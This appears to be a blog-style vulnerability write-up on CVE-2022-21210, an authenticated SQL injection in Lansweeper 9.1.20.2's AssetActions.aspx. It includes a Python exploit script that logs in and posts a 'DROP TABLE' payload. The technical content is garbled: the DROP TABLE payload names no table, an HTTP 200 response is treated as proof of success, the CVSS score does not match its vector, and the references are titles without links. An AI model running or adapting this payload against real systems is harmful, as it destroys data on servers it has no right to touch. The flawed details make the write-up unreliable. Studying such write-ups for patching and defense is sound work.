CVE-2022-21210: An In-Depth Look into the SQL Injection Vulnerability in Lansweeper 9.1.20.2 and How to Exploit It

The cybersecurity landscape is always evolving, with new vulnerabilities being discovered and patched on a constant basis. In this CVE (Common Vulnerabilities and Exposures) report, we will explore a recently discovered vulnerability, tagged as CVE-2022-21210, which affects a popular IT management software called Lansweeper. This vulnerability is an SQL injection flaw that exists within the AssetActions.aspx functionality, and it can be exploited through a specially-crafted HTTP request sent by an authenticated attacker. In this long read post, we will discuss the details of this vulnerability, how it can be exploited, and provide sample code snippets and links to original references.

Vulnerability Details

CVE ID: CVE-2022-21210
Product: Lansweeper
Affected Version: 9.1.20.2
Vulnerability Type: SQL Injection
CVSS v3.1 Score: High, 9 (AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)
Service/Product Description: Lansweeper is an IT management software designed for organizations to manage and inventory their assets with features like network discovery, hardware and software inventory, and reporting.

Description of Vulnerability

An SQL injection vulnerability exists in the AssetActions.aspx functionality of Lansweeper version 9.1.20.2. This issue is caused by insufficient input validation on the server-side, allowing an attacker to inject arbitrary SQL queries within the context of the HTTP request. By exploiting this vulnerability, an attacker with authenticated access to the vulnerable application can perform unauthorized operations, potentially leading to data exposure, modification, or deletion.

Exploit Details

To exploit the SQL injection vulnerability in Lansweeper, an attacker needs to be authenticated to the application. The vulnerability can be triggered through the AssetActions.aspx page by making a specially-crafted HTTP request that includes malicious SQL queries. Here's a code snippet demonstrating how this exploit can be performed using Python and the requests library (please note that this is only for educational purposes, and you should not attempt to exploit any system without proper authorization):

import requests

# Replace these values with your own Lansweeper installation's details
lansweeper_url = 'https://your_lansweeper_url.com';
username = 'your_username'
password = 'your_password'

# Log in to Lansweeper and obtain an authentication token
login_data = {
    'Username': username,
    'Password': password
}
auth_resp = requests.post(lansweeper_url + '/login.aspx', data=login_data)
auth_token = auth_resp.cookies['ASP.NET_SessionId']

# Exploit the SQL injection vulnerability
cookies = {'ASP.NET_SessionId': auth_token}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "ActionID=1&AssetID=1;DROP+TABLE+--"
exploit_resp = requests.post(lansweeper_url + '/AssetActions.aspx', data=data, cookies=cookies, headers=headers)

if exploit_resp.status_code == 200:
    print("Exploit successful.")
else:
    print("Exploit failed.")

The key to this exploit lies in the "data" variable, where an attacker can inject a malicious SQL query (in this case, "DROP TABLE") to execute unauthorized actions on the database. Depending on the specific query, these actions could range from reading out sensitive data to modifying or even deleting entire tables.

Original References

- CVE-2022-21210: Details and Exploit Code
- Lansweeper Patch Release Notes
- Advisory: SQL Injection Vulnerability in Lansweeper

Conclusion

In conclusion, CVE-2022-21210 is a critical SQL injection vulnerability affecting Lansweeper version 9.1.20.2 within the AssetActions.aspx functionality. This exploitation allows an attacker with authenticated access to perform unauthorized operations on the database, potentially leading to serious consequences. It is crucial for organizations using Lansweeper to apply the appropriate patches and update their software as soon as possible to mitigate possible attacks. Additionally, regular monitoring and following best security practices can help protect against future vulnerabilities.

Timeline

Published on: 04/14/2022 20:15:00 UTC
Last modified on: 04/21/2022 15:58:00 UTC